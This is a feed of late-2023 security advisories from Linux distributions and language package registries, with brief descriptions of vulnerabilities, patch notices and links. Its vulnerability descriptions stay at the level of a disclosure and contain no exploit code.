24.11.2023 13:49:36	pypi	[PYSEC-2023-243] localstack vulnerability	Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
25.11.2023 02:00:00	gentoo	[GLSA-202311-06] multipath-tools: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in multipath-tools, the worst of which can lead to root privilege escalation.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-06
25.11.2023 02:00:00	gentoo	[GLSA-202311-13] Apptainer: Privilege Escalation (high)	A privilege escalation vulnerability has been discoverd in Apptainer.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-13
25.11.2023 02:00:00	gentoo	[GLSA-202311-14] GRUB: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discoverd in GRUB, which may lead to secure boot circumvention or code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-14
25.11.2023 02:00:00	gentoo	[GLSA-202311-07] AIDE: Root Privilege Escalation (high)	A vulnerability has been found in AIDE which can lead to root privilege escalation.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-07
25.11.2023 02:00:00	gentoo	[GLSA-202311-08] GNU Libmicrohttpd: Buffer Overflow Vulnerability (high)	A buffer overflow vulnerability has been discovered in GNU Libmicrohttpd.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-08
25.11.2023 02:00:00	gentoo	[GLSA-202311-09] Go: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Go, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-09
25.11.2023 02:00:00	gentoo	[GLSA-202311-10] RenderDoc: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in RenderDoc, the worst of which leads to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-10
25.11.2023 02:00:00	gentoo	[GLSA-202311-11] QtWebEngine: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-11
25.11.2023 02:00:00	gentoo	[GLSA-202311-12] MiniDLNA: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in MiniDLNA, the worst of which could lead to remove code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-12
26.11.2023 02:00:00	gentoo	[GLSA-202311-16] Open vSwitch: Multiple Vulnerabilities (low)	Multiple denial of service vulnerabilites have been found in Open vSwitch.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-16
26.11.2023 02:00:00	gentoo	[GLSA-202311-15] LibreOffice: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in LibreOffice, the worst of which could lead to code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-15
26.11.2023 02:00:00	gentoo	[GLSA-202311-17] phpMyAdmin: Multiple Vulnerabilities (low)	Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of which allows for denial of service.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-17
26.11.2023 02:00:00	gentoo	[GLSA-202311-14] GRUB: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discoverd in GRUB, which may lead to secure boot circumvention or code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-14
26.11.2023 14:18:49	pypi	[PYSEC-2023-243] localstack vulnerability	Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
27.11.2023 20:11:30	ubuntu	[USN-6513-2] Python vulnerability	Several security issues were fixed in Python.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6513-2
27.11.2023 17:59:49	ubuntu	[USN-6402-2] LibTomMath vulnerability	LibTomMatch could be made to execute arbitrary code ordenial of service if it received a specially crafted input.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6402-2
27.11.2023 16:15:35	ubuntu	[USN-6517-1] Perl vulnerabilities	Several security issues were fixed in Perl.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6517-1
27.11.2023 16:08:08	ubuntu	[USN-6502-2] Linux kernel (Oracle) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-2
27.11.2023 15:41:01	ubuntu	[USN-6516-1] Linux kernel (Intel IoTG) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6516-1
27.11.2023 07:45:20	ubuntu	[USN-6515-1] Thunderbird vulnerabilities	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6515-1
27.11.2023 02:00:00	gentoo	[GLSA-202311-18] GLib: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in GLib.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-18
27.11.2023 01:54:45	ubuntu	[USN-6514-1] Open vSwitch vulnerability	Open vSwitch could be made to expose sensitive information over thenetwork.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6514-1
28.11.2023 22:17:29	ubuntu	[USN-6502-3] Linux kernel (NVIDIA) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-3
28.11.2023 22:01:23	ubuntu	[USN-6520-1] Linux kernel (StarFive) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6520-1
28.11.2023 20:11:57	ubuntu	[USN-6519-1] EC2 hibagent update	A security improvement was added to EC2 hibagent.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6519-1
28.11.2023 18:24:17	ubuntu	[USN-6518-1] AFFLIB vulnerability	AFFLIB could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6518-1
28.11.2023 15:11:44	ubuntu	[USN-6508-2] poppler regression	USN-6508-1 caused some minor regressions in poppler.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6508-2
28.11.2023 16:17:30	rustsec	[RUSTSEC-2023-0072] `openssl` `X509StoreRef::objects` is unsound	This function returned a reference into an OpenSSL datastructure, but there was no way to ensure OpenSSL would not mutate the datastructure behind ones back.Use of this function should be replaced with `X509StoreRef::all_certificates`.	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0072
28.11.2023 19:40:54	rustsec	[RUSTSEC-2023-0071] Marvin Attack: potential key recovery through timing sidechannels	### ImpactDue to a non-constant-time implementation, information about the private key is leaked through timing information which is observable over the network. An attacker may be able to use that information to recover the key.### PatchesNo patch is yet available, however work is underway to migrate to a fully constant-time implementation.### WorkaroundsThe only currently available workaround is to avoid using the `rsa` crate in settings where attackers are able to observe timing information, e.g. local use on a non-compromised computer is fine.### ReferencesThis vulnerability was discovered as part of the "[Marvin Attack]", which revealed several implementations of RSA including OpenSSL had not properly mitigated timing sidechannel attacks.[Marvin Attack]: https://people.redhat.com/~hkario/marvin/	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0071
30.11.2023 01:00:14	ubuntu	[USN-6528-1] OpenJDK 8 vulnerabilities	Several security issues were fixed in OpenJDK.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6528-1
29.11.2023 23:56:58	ubuntu	[USN-6527-1] OpenJDK vulnerabilities	Several security issues were fixed in OpenJDK 17, OpenJDK 21, OpenJDK.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6527-1
29.11.2023 20:18:18	msrc	[MS:CVE-2023-6351] Chromium: CVE-2023-6351 Use after free in libavif		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6351
29.11.2023 20:18:16	msrc	[MS:CVE-2023-6350] Chromium: CVE-2023-6350 Out of bounds memory access in libavif		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6350
29.11.2023 20:18:13	msrc	[MS:CVE-2023-6348] Chromium: CVE-2023-6348 Type Confusion in Spellcheck		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6348
29.11.2023 20:18:11	msrc	[MS:CVE-2023-6347] Chromium: CVE-2023-6347 Use after free in Mojo		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6347
29.11.2023 20:18:10	msrc	[MS:CVE-2023-6346] Chromium: CVE-2023-6346 Use after free in WebAudio		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6346
29.11.2023 20:18:06	msrc	[MS:CVE-2023-6345] Chromium: CVE-2023-6345 Integer overflow in Skia		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6345
29.11.2023 19:48:53	ubuntu	[USN-6526-1] GStreamer Bad Plugins vulnerabilities	Several security issues were fixed in GStreamer Bad Plugins.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6526-1
29.11.2023 19:39:38	ubuntu	[USN-6519-2] EC2 hibagent update	A security improvement was added to EC2 hibagent.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6519-2
29.11.2023 17:51:58	ubuntu	[USN-6525-1] pysha3 vulnerability	pysha3 could be made to crash or run programs if it received speciallycrafted data.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6525-1
29.11.2023 17:46:37	ubuntu	[USN-6524-1] PyPy vulnerability	PyPy could be made to crash or run programs if it received speciallycrafted data.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6524-1
29.11.2023 15:41:02	ubuntu	[USN-6523-1] u-boot-nezha vulnerability	Several security issues were fixed in u-boot-nezha.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6523-1
29.11.2023 15:34:38	ubuntu	[USN-6522-1] FreeRDP vulnerabilities	Several security issues were fixed in FreeRDP.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6522-1
29.11.2023 15:17:06	ubuntu	[USN-6521-1] GIMP vulnerabilities	GIMP could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6521-1
29.11.2023 20:14:14	pypi	[PYSEC-2023-243] localstack vulnerability	Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
30.11.2023 23:22:23	slackware	[SSA:2023-334-01] samba	New samba packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/samba-4.18.9-i586-1_slack15.0.txz: Upgraded. This is a security release in order to address the following defect: An information leak vulnerability was discovered in Samba's LDAP server. Due to missing access control checks, an authenticated but unprivileged attacker could discover the names and preserved attributes of deleted objects in the LDAP store. Upgrading to this package will not prevent this information leak - if you are using Samba as an Active Directory Domain Controller, you will need to follow the instructions in the samba.org link given below. For more information, see: https://www.samba.org/samba/security/CVE-2018-14628.html https://www.cve.org/CVERecord?id=CVE-2018-14628 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/samba-4.18.9-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/samba-4.18.9-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-4.19.3-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/samba-4.19.3-x86_64-1.txzMD5 signaturesSlackware 15.0 package:f73bf7dc7dc0ac254840a236d609bda2 samba-4.18.9-i586-1_slack15.0.txzSlackware x86_64 15.0 package:152b8d8fcc261ae89effaf5181b54243 samba-4.18.9-x86_64-1_slack15.0.txzSlackware -current package:f9874a7129f05b59febd0c85a61488c3 n/samba-4.19.3-i586-1.txzSlackware x86_64 -current package:e91fa8957a4400c3218f309a22a2e8eb n/samba-4.19.3-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg samba-4.18.9-i586-1_slack15.0.txz`If you are concerned about the information leak, please follow the additionalinstructions found at this link:https://www.samba.org/samba/security/CVE-2018-14628.html	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-334-01
30.11.2023 19:56:50	ubuntu	[USN-6494-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6494-2
30.11.2023 19:38:29	ubuntu	[USN-6495-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6495-2
30.11.2023 19:24:11	ubuntu	[USN-6496-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6496-2
30.11.2023 18:56:33	ubuntu	[USN-6502-4] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-4
30.11.2023 22:29:51	rubysec	[RUBYSEC:CARRIERWAVE-2023-49090] CarrierWave Content-Type allowlist bypass vulnerability, possibly leading to XSS (medium)	###Impact[CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb)has a Content-Type allowlist bypass vulnerability, possibly leading to XSS.The validation in `allowlisted_content_type?` determines Content-Typepermissions by performing a partial match.If the `content_type` argument of `allowlisted_content_type?` is passeda value crafted by the attacker, Content-Types not included in the`content_type_allowlist` will be allowed.In addition, by setting the Content-Type configured by the attackerat the time of file delivery, it is possible to cause XSS on theuser's browser when the uploaded file is opened.### PatchesUpgrade to [3.0.5](https://rubygems.org/gems/carrierwave/versions/3.0.5)or [2.2.5](https://rubygems.org/gems/carrierwave/versions/2.2.5).### WorkaroundsWhen validating with `allowlisted_content_type?` in[CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb),forward match(`\\A`) the Content-Type set in `content_type_allowlist`,preventing unintentional permission of `text/html;image/png` whenyou want to allow only `image/png` in `content_type_allowlist`.### References[OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:CARRIERWAVE-2023-49090
01.12.2023 18:57:31	suse	[SUSE-SU-2023:4634-1] Security update for ImageMagick (important)	Security update for ImageMagick	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4634-1
01.12.2023 15:37:06	suse	[SUSE-SU-2023:4631-1] Security update for python-Pillow (important)	Security update for python-Pillow	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4631-1
01.12.2023 15:36:58	suse	[SUSE-SU-2023:4630-1] Security update for python-Pillow (important)	Security update for python-Pillow	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4630-1
01.12.2023 10:26:08	suse	[SUSE-SU-2023:4625-1] Security update for containerd, docker, runc (important)	Security update for containerd, docker, runc	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4625-1
02.12.2023 19:00:59	opensuse	[openSUSE-SU-2023:0388-1] Security update for optipng (moderate)	Security update for optipng	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0388-1
04.12.2023 20:07:01	ubuntu	[USN-6529-1] Request Tracker vulnerabilities	Several security issues were fixed in Request Tracker.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6529-1
04.12.2023 04:22:47	ubuntu	[USN-6509-2] Firefox regressions	USN-6509-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6509-2
04.12.2023 18:37:59	almalinux	[ALSA-2023:7581] postgresql:13 security update (important)	postgresql:13 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7581
04.12.2023 03:02:18	almalinux	[ALSA-2023:7549] kernel security and bug fix update (important)	kernel security and bug fix update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7549
06.12.2023 01:21:49	ubuntu	[USN-6534-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6534-1
05.12.2023 23:59:34	ubuntu	[USN-6533-1] Linux kernel (OEM) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6533-1
05.12.2023 23:13:46	ubuntu	[USN-6532-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6532-1
05.12.2023 18:35:31	ubuntu	[USN-6531-1] Redis vulnerabilities	Several security issues were fixed in Redis.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6531-1
05.12.2023 15:12:31	ubuntu	[USN-6530-1] HAProxy vulnerability	HAProxy could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6530-1
05.12.2023 02:00:00	cisa	[CISA-2023:1205] CISA Adds 4 Known Exploited Vulnerabilities to Catalog	CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1205
06.12.2023 17:22:41	ubuntu	[USN-6539-1] python-cryptography vulnerabilities	Several security issues were fixed in python-cryptography.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6539-1
06.12.2023 17:11:27	ubuntu	[USN-6538-1] PostgreSQL vulnerabilities	Several security issues were fixed in PostgreSQL.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6538-1
06.12.2023 15:55:09	ubuntu	[USN-6537-1] Linux kernel (GCP) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6537-1
06.12.2023 15:34:15	ubuntu	[USN-6536-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6536-1
06.12.2023 14:11:58	ubuntu	[USN-6535-1] curl vulnerabilities	Several security issues were fixed in curl.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6535-1
06.12.2023 11:43:32	ubuntu	[USN-6463-2] Open VM Tools vulnerabilities	Several security issues were fixed in Open VM Tools.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6463-2
06.12.2023 09:15:41	alpinelinux	[ALPINE:CVE-2023-2861] qemu vulnerability	[From CVE-2023-2861] A flaw was found in the 9p passthrough filesystem (9pfs) implementation in QEMU. The 9pfs server did not prohibit opening special files on the host side, potentially allowing a malicious client to escape from the exported 9p tree by creating and opening a device file in the shared folder.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-2861
08.12.2023 23:15:07	alpinelinux	[ALPINE:CVE-2023-34320] xen vulnerability	[From CVE-2023-34320] Cortex-A77 cores (r0p0 and r1p0) are affected by erratum 1508412where software, under certain circumstances, could deadlock a coredue to the execution of either a load to device or non-cacheable memory,and either a store exclusive or register read of the PhysicalAddress Register (PAR_EL1) in close proximity.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34320
07.12.2023 20:59:06	msrc	[MS:CVE-2023-6512] Chromium: CVE-2023-6512 Inappropriate implementation in Web Browser UI		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6512
07.12.2023 20:59:04	msrc	[MS:CVE-2023-6511] Chromium: CVE-2023-6511 Inappropriate implementation in Autofill		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6511
07.12.2023 20:59:02	msrc	[MS:CVE-2023-6510] Chromium: CVE-2023-6510 Use after free in Media Capture		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6510
07.12.2023 20:59:00	msrc	[MS:CVE-2023-6509] Chromium: CVE-2023-6509 Use after free in Side Panel Search		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6509
07.12.2023 20:58:56	msrc	[MS:CVE-2023-6508] Chromium: CVE-2023-6508 Use after free in Media Stream		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6508
07.12.2023 19:50:46	ubuntu	[USN-6542-1] TinyXML vulnerability	TinyXML could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6542-1
07.12.2023 18:32:37	suse	[SUSE-SU-2023:4693-1] Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container (important)	Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4693-1
07.12.2023 18:24:50	ubuntu	[USN-6541-1] GNU C Library vulnerabilities	Several security issues were fixed in GNU C Library.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6541-1
07.12.2023 13:00:10	ubuntu	[USN-6522-2] FreeRDP vulnerabilities	Several security issues were fixed in FreeRDP.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6522-2
07.12.2023 12:41:45	suse	[SUSE-SU-2023:4690-1] Security update for poppler (moderate)	Security update for poppler	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4690-1
07.12.2023 11:01:17	opensuse	[openSUSE-SU-2023:0391-1] Security update for libtorrent-rasterbar, qbittorrent (moderate)	Security update for libtorrent-rasterbar, qbittorrent	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0391-1
07.12.2023 10:49:38	suse	[SUSE-SU-2023:4689-1] Security update for cdi-apiserver-container, cdi-cloner-container, cdi-controller-container, cdi-importer-container, cdi-operator-container, cdi-uploadproxy-container, cdi-uploadserver-container, containerized-data-importer (important)	Security update for cdi-apiserver-container, cdi-cloner-container, cdi-controller-container, cdi-importer-container, cdi-operator-container, cdi-uploadproxy-container, cdi-uploadserver-container, containerized-data-importer	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4689-1
07.12.2023 10:00:00	msrc	[MS:CVE-2023-35618] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35618
07.12.2023 10:00:00	msrc	[MS:CVE-2023-38174] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38174
07.12.2023 10:00:00	msrc	[MS:CVE-2023-36880] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36880
07.12.2023 07:15:09	alpinelinux	[ALPINE:CVE-2023-41913] strongswan vulnerability	[From CVE-2023-41913] strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-41913
07.12.2023 06:07:20	ubuntu	[USN-6540-1] BlueZ vulnerability	BlueZ could be made to give a physically proximate attacker keyboard andmouse control of a computer.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6540-1
07.12.2023 03:15:07	alpinelinux	[ALPINE:CVE-2023-46218] curl vulnerability	[From CVE-2023-46218] This flaw allows a malicious HTTP server to set "super cookies" in curl thatare then passed back to more origins than what is otherwise allowed orpossible. This allows a site to set cookies that then would get sent todifferent and unrelated sites and domains.It could do this by exploiting a mixed case flaw in curl's function thatverifies a given cookie domain against the Public Suffix List (PSL). Forexample a cookie could be set with `domain=co.UK` when the URL used a lowercase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46218
06.12.2023 19:15:07	alpinelinux	[ALPINE:CVE-2023-39326] go vulnerability	[From CVE-2023-39326] A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-39326
07.12.2023 16:01:08	rubysec	[RUBYSEC:PUBNUB-2023-26154] pubnub Insufficient Entropy vulnerability (medium)	Versions of the package pubnub before 7.4.0; all versions of thepackage com.pubnub:pubnub; versions of the package pubnub before6.19.0; all versions of the package github.com/pubnub/go; versionsof the package github.com/pubnub/go/v7 before 7.2.0; versions ofthe package pubnub before 7.3.0; versions of the package pubnub/pubnubbefore 6.1.0; versions of the package pubnub before 5.3.0; versionsof the package pubnub before 0.4.0; versions of the package pubnub/c-corebefore 4.5.0; versions of the package com.pubnub:pubnub-kotlin before7.7.0; versions of the package pubnub/swift before 6.2.0; versionsof the package pubnub before 5.2.0; versions of the package pubnubbefore 4.3.0 are vulnerable to Insufficient Entropy via the getKeyfunction, due to inefficient implementation of the AES-256-CBCcryptographic algorithm. The provided encrypt function is less securewhen hex encoding and trimming are applied, leaving half of the bitsin the key always the same for every encoded message or file.Note:In order to exploit this vulnerability, the attacker needs to investresources in preparing the attack and brute-force the encryption.	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:PUBNUB-2023-26154
10.12.2023 03:15:09	slackware	[SSA:2023-343-01] libxml2	New libxml2 packages are available for Slackware 14.0, 14.1, 14.2, 15.0,and -current to fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libxml2-2.12.2-i586-1_slack15.0.txz: Upgraded. Add --sysconfdir=/etc option so that this can find the xml catalog. Thanks to SpiderTux. Fix the following security issues: Fix integer overflows with XML_PARSE_HUGE. Fix dict corruption caused by entity reference cycles. Hashing of empty dict strings isn't deterministic. Fix null deref in xmlSchemaFixupComplexType. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-40303 https://www.cve.org/CVERecord?id=CVE-2022-40304 https://www.cve.org/CVERecord?id=CVE-2023-29469 https://www.cve.org/CVERecord?id=CVE-2023-28484 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 14.0:ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.12.2-i486-1_slack14.0.txzUpdated package for Slackware x86_64 14.0:ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.12.2-x86_64-1_slack14.0.txzUpdated package for Slackware 14.1:ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.12.2-i486-1_slack14.1.txzUpdated package for Slackware x86_64 14.1:ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.12.2-x86_64-1_slack14.1.txzUpdated package for Slackware 14.2:ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libxml2-2.12.2-i586-1_slack14.2.txzUpdated package for Slackware x86_64 14.2:ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libxml2-2.12.2-x86_64-1_slack14.2.txzUpdated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libxml2-2.12.2-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libxml2-2.12.2-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.12.2-i586-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.12.2-x86_64-2.txzMD5 signaturesSlackware 14.0 package:781670f0524d4980ef7b48876fc07b35 libxml2-2.12.2-i486-1_slack14.0.txzSlackware x86_64 14.0 package:6e5084f495e8401e097d49bec5d470d0 libxml2-2.12.2-x86_64-1_slack14.0.txzSlackware 14.1 package:1e3a912ba24a2ee014b239ed03302260 libxml2-2.12.2-i486-1_slack14.1.txzSlackware x86_64 14.1 package:6e0bbf965cca0038a13f6f5faaac690d libxml2-2.12.2-x86_64-1_slack14.1.txzSlackware 14.2 package:7f11d69e862d4d42407bf9fbc8b134a8 libxml2-2.12.2-i586-1_slack14.2.txzSlackware x86_64 14.2 package:8f06b46fdf685dedd2d56400503e80b6 libxml2-2.12.2-x86_64-1_slack14.2.txzSlackware 15.0 package:936f1e6831a94df80e926e173505ad17 libxml2-2.12.2-i586-1_slack15.0.txzSlackware x86_64 15.0 package:5691184f8e0b89b5fb4344e9d4b4f732 libxml2-2.12.2-x86_64-1_slack15.0.txzSlackware -current package:bfa544daff81a3f89e44dd9f1f6b997e l/libxml2-2.12.2-i586-2.txzSlackware x86_64 -current package:e866ccd932b516f53cc5cf3c30e1c70a l/libxml2-2.12.2-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libxml2-2.12.2-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-343-01
